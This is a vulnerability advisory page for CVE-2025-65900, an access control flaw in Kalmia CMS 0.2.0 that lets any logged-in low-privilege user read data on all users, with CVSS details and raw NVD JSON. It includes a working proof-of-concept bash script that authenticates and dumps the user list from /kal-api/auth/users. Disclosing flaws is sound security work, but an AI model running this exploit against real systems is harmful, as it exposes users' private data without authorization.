Security Vulnerability Report
中文
CVE-2025-65900 CVSS 6.5 MEDIUM

CVE-2025-65900

Published: 2025-12-04 22:15:49
Last Modified: 2025-12-10 21:38:41
Source: [email protected]

Description

Kalmia CMS version 0.2.0 contains an Incorrect Access Control vulnerability in the /kal-api/auth/users API endpoint. Due to insufficient permission validation and excessive data exposure in the backend, an authenticated user with basic read permissions can retrieve sensitive information for all platform users.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:difuse:kalmia:0.2.0:*:*:*:*:node.js:*:* - VULNERABLE
Kalmia CMS < 0.2.0
Kalmia CMS = 0.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-65900 PoC - Kalmia CMS Unauthorized User Data Access # Target: Kalmia CMS v0.2.0 # Endpoint: /kal-api/auth/users TARGET_URL="http://target-server.com" USERNAME="regular_user" PASSWORD="user_password" # Step 1: Authenticate and obtain session/token echo "[*] Authenticating as regular user..." AUTH_RESPONSE=$(curl -s -X POST "${TARGET_URL}/kal-api/auth/login" \ -H "Content-Type: application/json" \ -d "{\"username\":\"${USERNAME}\",\"password\":\"${PASSWORD}\"}") # Extract token (adjust based on actual response format) TOKEN=$(echo "$AUTH_RESPONSE" | grep -oP '"token":"\K[^"]+') if [ -z "$TOKEN" ]; then echo "[!] Authentication failed" exit 1 fi echo "[+] Authentication successful" # Step 2: Exploit the vulnerability - access all users' data echo "[*] Exploiting CVE-2025-65900..." USER_DATA=$(curl -s -X GET "${TARGET_URL}/kal-api/auth/users" \ -H "Authorization: Bearer ${TOKEN}" \ -H "Content-Type: application/json") echo "[+] Retrieved sensitive user data:" echo "$USER_DATA" | jq . echo "[*] PoC completed - unauthorized access to all user information achieved"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65900", "sourceIdentifier": "[email protected]", "published": "2025-12-04T22:15:49.127", "lastModified": "2025-12-10T21:38:40.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kalmia CMS version 0.2.0 contains an Incorrect Access Control vulnerability in the /kal-api/auth/users API endpoint. Due to insufficient permission validation and excessive data exposure in the backend, an authenticated user with basic read permissions can retrieve sensitive information for all platform users."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:difuse:kalmia:0.2.0:*:*:*:*:node.js:*:*", "matchCriteriaId": "C633D4D2-F80B-4C2D-BFAF-757F8974D461"}]}]}], "references": [{"url": "https://github.com/DifuseHQ/Kalmia", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Noxurge/CVE-2025-65900/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.